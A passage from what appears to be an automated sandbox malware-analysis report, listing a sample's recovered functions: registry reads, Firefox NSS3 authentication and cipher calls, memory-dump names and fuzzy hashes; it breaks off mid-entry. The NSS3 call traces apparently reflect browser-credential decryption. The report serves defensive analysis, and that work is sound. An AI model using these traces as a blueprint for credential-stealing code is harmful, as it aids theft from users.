API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: e0403cd3f90b043713a2cedbc25eed705d0c1d26992e96c33dc5639ac9fa4085
Instruction ID: 0ab9b5cf999dd5e1f31eaf8862387afd5171a232b918902f21a8ddc8851dbf5a
Opcode Fuzzy Hash: e0403cd3f90b043713a2cedbc25eed705d0c1d26992e96c33dc5639ac9fa4085
Instruction Fuzzy Hash: 0D51AFB6A00201DBEB11DF69DC50BAA7BE4EF88348F250524E845ABB40EB31FD05CB95

Function 017F2D70 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 017F2D95
RegOpenKeyExA.ADVAPI32(80000001,013C0EA8,00000000,00020119,?), ref: 017F2DB4
RegQueryValueExA.ADVAPI32(?,013C0578,00000000,00000000,00000000,000000FF), ref: 017F2DD8
RegCloseKey.ADVAPI32(?), ref: 017F2DE2
lstrcat.KERNEL32(?,00000000), ref: 017F2E07
lstrcat.KERNEL32(?,013C05A8), ref: 017F2E1B

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: d5e13844d2074bd3cfdfe65b3694373ca06c9ad9f0b187bea52fdebd9803d2ab
Instruction ID: 9b4e745350dfda6916c5d9717ff70e83ce459fece75e387a24c84ab1aff17976
Opcode Fuzzy Hash: d5e13844d2074bd3cfdfe65b3694373ca06c9ad9f0b187bea52fdebd9803d2ab
Instruction Fuzzy Hash: BE41B5B6D0010C67CF15FBA0DC8EEEEB37DAB58700F14455DE71A96188EA709B898F91

Function 6C58EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C58EF38

Part of subcall function 6C579520: PK11_IsLoggedIn.NSS3(00000000,?,6C5A379E,?,00000001,?), ref: 6C579542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C58EF53

Part of subcall function 6C594C20: TlsGetValue.KERNEL32 ref: 6C594C4C
Part of subcall function 6C594C20: EnterCriticalSection.KERNEL32(?), ref: 6C594C60
Part of subcall function 6C594C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C594CA1
Part of subcall function 6C594C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C594CBE
Part of subcall function 6C594C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C594CD2
Part of subcall function 6C594C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C594D3A

PR_GetCurrentThread.NSS3 ref: 6C58EF9E

Part of subcall function 6C619BF0: TlsGetValue.KERNEL32(?,?,?,6C660A75), ref: 6C619C07

free.MOZGLUE(00000000), ref: 6C58EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C58F016
free.MOZGLUE(00000000), ref: 6C58F022

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: df4fc508c7388797fd20827daf84bcda2e0ea8d0fee202a990e9f572f003048c
Instruction ID: 33254cd0f7827677a17ee5f47ae0d1db2259f4d3beed93260b97cd5198d05d16
Opcode Fuzzy Hash: df4fc508c7388797fd20827daf84bcda2e0ea8d0fee202a990e9f572f003048c
Instruction Fuzzy Hash: DA41AFB1E0120AAFDF018FA9DC85BEE7BB9AF48348F104025F915A7350E772D9158BA1

Function 6C564860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C564894

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5648CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5648DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C5648FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C564912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56494A

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 44d0237c9bef81a1b3913052676e408d134cf8a00081d875e538a2dabd968c33
Instruction ID: 75ed6be1f594fd2116a11f993f0aa70dd36db23075bcedfc6b6ba7f98bb54480
Opcode Fuzzy Hash: 44d0237c9bef81a1b3913052676e408d134cf8a00081d875e538a2dabd968c33
Instruction Fuzzy Hash: 1D41C271604305ABE704DFABDC90BAB73E8AF8421CF04062CEA5597B51FB70E945CB96

Function 6C57CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C57CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C57D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C57D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C57D025
PR_NewLock.NSS3 ref: 6C57D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C57D074

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: dd85a3b55e76ea36944ce017f4d20b664008688b15d758385f584d762b66b8ed
Instruction ID: 6d39b8ef8fe608c992d13b79510fe68ad0d35a06b2a8fceb04f02290f9527dee
Opcode Fuzzy Hash: dd85a3b55e76ea36944ce017f4d20b664008688b15d758385f584d762b66b8ed
Instruction Fuzzy Hash: 1F418EB0A012118FDB60DF29CC8879A7BE4EF48318F11556ADC198BB46E774D8C5CBB5

Function 6C562E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C552D1A), ref: 6C562E7E

Part of subcall function 6C5B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C558298,?,?,?,6C54FCE5,?), ref: 6C5B07BF
Part of subcall function 6C5B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5B07E6
Part of subcall function 6C5B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5B081B
Part of subcall function 6C5B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5B0825

PR_Now.NSS3 ref: 6C562EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C562EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C552D1A), ref: 6C562F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C552D1A), ref: 6C562F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C562F81

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 2788bad5d8857916ec6132a7a7043088c1589b8b0faa9279e98365bbba15b222
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 7631F3715011008BE710C657CC9ABBEF2A5EF81358F644A7AD42DA7EF1EB319C8ACB51

Function 6C550E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C550A2C), ref: 6C550E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C550A2C), ref: 6C550E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C550A2C), ref: 6C550E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C550A2C), ref: 6C550E90
free.MOZGLUE(00000000), ref: 6C550EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C550A2C), ref: 6C550ED9

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 3205a6f21c40b11d93f83c1190d672311f9bc8091d0a0347aa4d7af1e041f1b5
Instruction ID: cb58001586802fcae13a6b4a1d7c66c06809ce619d31371d5d1766fd7d11b8ae
Opcode Fuzzy Hash: 3205a6f21c40b11d93f83c1190d672311f9bc8091d0a0347aa4d7af1e041f1b5
Instruction Fuzzy Hash: 03212E73B0028497EB0085665C45B6B76AEDBC174CFA94437D81867B02FA61DC3582A2

Function 017F93C0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 017F93CE

Part of subcall function 017F8E61: __mtinitlocknum.LIBCMT ref: 017F8E77
Part of subcall function 017F8E61: __amsg_exit.LIBCMT ref: 017F8E83
Part of subcall function 017F8E61: EnterCriticalSection.KERNEL32(00000000,00000000,?,017F9269,0000000D,?,?,017F8BEF,017F8A8D,?,?,017F8978,00000000,01802C50,017F89BF), ref: 017F8E8B

DecodePointer.KERNEL32(01802B58,00000020,017F9511,00000000,00000001,00000000,?,017F9533,000000FF,?,017F8E88,00000011,00000000,?,017F9269,0000000D), ref: 017F940A
DecodePointer.KERNEL32(?,017F9533,000000FF,?,017F8E88,00000011,00000000,?,017F9269,0000000D,?,?,017F8BEF,017F8A8D), ref: 017F941B

Part of subcall function 017F91E2: EncodePointer.KERNEL32(00000000,017FA9D2,01804DC8,00000314,00000000,?,?,?,?,?,017F9728,01804DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 017F91E4

DecodePointer.KERNEL32(-00000004,?,017F9533,000000FF,?,017F8E88,00000011,00000000,?,017F9269,0000000D,?,?,017F8BEF,017F8A8D), ref: 017F9441
DecodePointer.KERNEL32(?,017F9533,000000FF,?,017F8E88,00000011,00000000,?,017F9269,0000000D,?,?,017F8BEF,017F8A8D), ref: 017F9454
DecodePointer.KERNEL32(?,017F9533,000000FF,?,017F8E88,00000011,00000000,?,017F9269,0000000D,?,?,017F8BEF,017F8A8D), ref: 017F945E

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: c12b323d112a22ba766a79125930b401d593217686fbf2ac54323e04abace3ba
Instruction ID: 846c95678881f479f71bfa8656855b08ec4df45dd7c35cb01bfb06291749d98c
Opcode Fuzzy Hash: c12b323d112a22ba766a79125930b401d593217686fbf2ac54323e04abace3ba
Instruction Fuzzy Hash: 4B313A70A1030ADBDF51AFA9D8887AFFAF1BF68218F14402EE704A6385CB744945CF61

Function 6C5688D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C570725,00000000,00000058), ref: 6C568906
EnterCriticalSection.KERNEL32(?), ref: 6C56891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C56894A
calloc.MOZGLUE(00000001,6C57072D,00000000,00000000,00000000,?,6C570725,00000000,00000058), ref: 6C568959
memset.VCRUNTIME140(?,00000000,?), ref: 6C568993
PR_Unlock.NSS3(?), ref: 6C5689AF

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 4d1d9d494e2394e74d4efca9dccd65d10638117a31ad7967d15c201757ba4b1a
Instruction ID: 3262cc6ba92aceca31ba2ca151f31bf8c7c9b103978b58bfa238935cca45a3b3
Opcode Fuzzy Hash: 4d1d9d494e2394e74d4efca9dccd65d10638117a31ad7967d15c201757ba4b1a
Instruction Fuzzy Hash: AD312872E00215ABD7008F2ADC41A5AB7A4BF46358F198926EC1DD7F51E732E845C7D3

Function 6C55AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C55AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C55AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C55AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C55AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C679500), ref: 6C55AF23

Part of subcall function 6C5AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5AF0C8
Part of subcall function 6C5AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C55AF37

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: d66633cd265298b83f221b5230e7bb06a849829e7acdc57bdef82e95e2cc10c4
Instruction ID: 54a4ff0d5226714bec9be7a5fe1c7ed0727662497b1dd9374ce8044823ef184d
Opcode Fuzzy Hash: d66633cd265298b83f221b5230e7bb06a849829e7acdc57bdef82e95e2cc10c4
Instruction Fuzzy Hash: 6B215AB6909200ABE7108F29DC41BAA7BE4AFC532CF544316FC54AB780E732D91587B7

Function 6C5DEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5DEE85
realloc.MOZGLUE(5C13B8AF,?), ref: 6C5DEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C5DEEC5

Part of subcall function 6C5B0BE0: malloc.MOZGLUE(6C5A8D2D,?,00000000,?), ref: 6C5B0BF8
Part of subcall function 6C5B0BE0: TlsGetValue.KERNEL32(6C5A8D2D,?,00000000,?), ref: 6C5B0C15

htonl.WSOCK32(?), ref: 6C5DEEE3
htonl.WSOCK32(00000000,?), ref: 6C5DEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C5DEF01

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 99a5f38ec6289731884b0e2b6afbf4f3b9c9e5b49d1207c4c69f55c087a04e33
Instruction ID: 722552b4602716d6d58998880156eee323b557d3f9be0a0de7fc211787341be9
Opcode Fuzzy Hash: 99a5f38ec6289731884b0e2b6afbf4f3b9c9e5b49d1207c4c69f55c087a04e33
Instruction Fuzzy Hash: 8821B171A002159FCF109F28DC80B9AB7A4EF49358F158169EC199B741E730FC14CBEA

Function 6C58EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C58EE49

Part of subcall function 6C5AFAB0: free.MOZGLUE(?,-00000001,?,?,6C54F673,00000000,00000000), ref: 6C5AFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C58EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C58EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C58EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C58EEB3

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 79b1dd70ab7f333b11f9e7ff48dd835a1176a487326fba8d4005f38a972bc02e
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 0F21E7BAA01225ABEB118F58DC81EAB77A8EF45708F044164FD049B741E7B1EC1487F1

Function 6C5A4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C5A4EB8,?), ref: 6C5A4884

Part of subcall function 6C5A8800: TlsGetValue.KERNEL32(?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8821
Part of subcall function 6C5A8800: TlsGetValue.KERNEL32(?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A883D
Part of subcall function 6C5A8800: EnterCriticalSection.KERNEL32(?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8856
Part of subcall function 6C5A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5A8887
Part of subcall function 6C5A8800: PR_Unlock.NSS3(?,?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5A4EB8,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5A4EB8,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5678F8), ref: 6C5A4899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A48A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A48B8

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: a270d236e5af85bcd5a1f24e59dad06c6de23fe712d357b40b0e25cd73bda5b7
Instruction ID: 11cdf32e32e121584f5cd9aefb59857094337f9d2529febc42ccecc25a4bf680
Opcode Fuzzy Hash: a270d236e5af85bcd5a1f24e59dad06c6de23fe712d357b40b0e25cd73bda5b7
Instruction Fuzzy Hash: DF21D772F002429BEF049FE7FCC451EB7B8EF46358B141934DA0547A02EF21E82687A6

Function 6C668910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C66892E

